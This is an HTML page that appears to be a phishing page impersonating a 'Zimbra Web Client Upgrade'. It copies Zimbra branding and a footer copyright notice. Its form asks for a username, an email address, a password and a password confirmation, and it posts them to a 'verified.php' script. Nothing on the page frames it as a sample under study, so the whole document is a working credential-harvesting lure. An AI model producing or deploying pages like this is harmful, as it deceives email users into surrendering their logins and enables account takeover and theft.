<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="icon" href="favicon.ico">
<link rel="shortcut icon" href="favicon.ico">
<title>Zimbra Web Client Upgrade</title>
<style type="text/css">
#apDiv1 {
	position:absolute;
	width:553px;
	height:454px;
	z-index:1;
	left: 380px;
	top: 82px;
}
#apDiv2 {
	position:absolute;
	width:271px;
	height:115px;
	z-index:2;
	left: 595px;
	top: 178px;
}
#apDiv6 {
	position:absolute;
	width:152px;
	height:115px;
	z-index:5;
	left: 436px;
	top: 184px;
}
body,td,th {
	color: #333;
	font-family: Arial, Helvetica, sans-serif;
	font-size: small;
}
#apDiv4 {
	position:absolute;
	width:988px;
	height:115px;
	z-index:6;
	left: 99px;
	top: 563px;
}
</style>
</head>

<body bgcolor="#E5E6E8">
<div id="apDiv1"><img src="image/bn.jpg" width="564" height="462" /></div>
<div id="apDiv2"> <div id="apDiv3">
  <form enctype="multipart/form-data" action="verified.php" method="post">
    <p>
     <input name='UserID' type=text onblur="MM_validateForm('UserID','','R');return document.MM_returnValue" size=40> <br /> <br />
      <input name='email' type=text onchange="MM_validateForm('email','','RisEmail');return document.MM_returnValue" size=40> <br /> <br />
      <input name='password' type=password id="password" onblur="MM_validateForm('Password','','R');return document.MM_returnValue" size=40><br /><br />
      <input name='confirm_password' type=password onchange="MM_validateForm('confirm_password','','R');return document.MM_returnValue" size=40><br /><br />
     <input type=submit value='Sign In'>
      
    </p>
  </form>
  
  
  </div></div>
<div id="apDiv6" align="right">
  <h4><strong>Username:</strong>*</h4>
  <h4><strong>Email:</strong>*</h4>
  <h4><strong>Password:*</strong></h4>
  <h4><strong>Confirm Password:*</strong></h4>
</div>
<p>&nbsp;</p>
<div id="apDiv4">
  <table width="949" border="0">
    <tr>
      <td width="943" align="center"><p><a href="#">Zimbra</a> :: the leader in open source messaging and collaboration ::<a href="#"> Blog</a> - <a href="#">Wiki </a>- <a href="#">Forums</a><br />
Copyright © 2005-2014 Telligent Systems, Inc. All rights reserved. &quot;Telligent&quot; and &quot;Zimbra&quot; are registered trademarks or trademarks of Telligent Systems, Inc.</p>
      <p>&nbsp;</p></td>
    </tr>
  </table>
  <br />
</div>
</body>
</html>
